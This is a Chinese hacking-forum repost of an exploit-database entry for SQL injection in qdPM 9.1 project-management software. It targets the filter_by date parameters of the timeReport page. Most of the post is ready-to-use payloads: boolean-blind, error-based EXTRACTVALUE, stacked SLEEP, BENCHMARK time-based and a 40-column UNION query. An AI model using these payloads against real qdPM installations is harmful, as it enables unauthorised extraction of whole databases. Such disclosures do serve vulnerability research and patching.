跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

qdPM 9.1 - 'filter_by' SQL Injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: qdPM 9.1 - 'filter_by' SQL Injection
# Date: 2018-11-01
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: XAMPP for Linux 5.6.38-0
# Software description:
# Free project management tool for small team
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact
# using a Ticket System that is integrated into Task management.

# Vulnerabilities:
# The application accommodates 3 different vulnerabilities.
# SQL Injection - Cross-Site Scripting and Denial of Service.

# POC 1 : SQL Inection :
# An attacker can gain access to all the database information using filter_by[CommentCreatedFrom]
# and filter_by[5BCommentCreatedTo] parameters.

# Parameter: filter_by[CommentCreatedFrom] and filter_by[5BCommentCreatedTo](POST)
# Request URL: /index.php/timeReport

#    Type: boolean-based blind
#    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
#    Payload: 

filter_by[CommentCreatedFrom]=2018-10-30") RLIKE (SELECT (CASE WHEN (7166=7166) THEN #0x323031382d31302d3330 ELSE 0x28 END)) AND ("votm"="votm&filter_by[CommentCreatedTo]=2018-10-17

#    Type: error-based
#    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
#    Payload: 

filter_by[CommentCreatedFrom]=2018-10-30") AND EXTRACTVALUE(2944,CONCAT(0x5c,0x716a766b71,(SELECT #(ELT(2944=2944,1))),0x7178717871)) AND ("ilfY"="ilfY&filter_by[CommentCreatedTo]=2018-10-17

#    Type: stacked queries
#    Title: MySQL > 5.0.11 stacked queries (comment)
#    Payload: 

filter_by[CommentCreatedFrom]=2018-10-30");SELECT SLEEP(5)#&filter_by[CommentCreatedTo]=2018-10-17

#    Type: AND/OR time-based blind
#    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
#    Payload:

filter_by[CommentCreatedFrom]=2018-10-30") AND 2173=BENCHMARK(5000000,MD5(0x7652785a)) AND #("PRig"="PRig&filter_by[CommentCreatedTo]=2018-10-17

#    Type: UNION query
#    Title: Generic UNION query (NULL) - 40 columns
#    Payload:

filter_by[CommentCreatedFrom]=2018-10-30") UNION ALL SELECT #33,33,33,33,33,33,33,33,33,33,CONCAT(0x716a766b71,0x474b474f65666b437365466773655373776743495a75536670676f41445249514775775a6f4d6a63,0x7178717871),#33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33-- #pqmn&filter_by[CommentCreatedTo]=2018-10-17

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。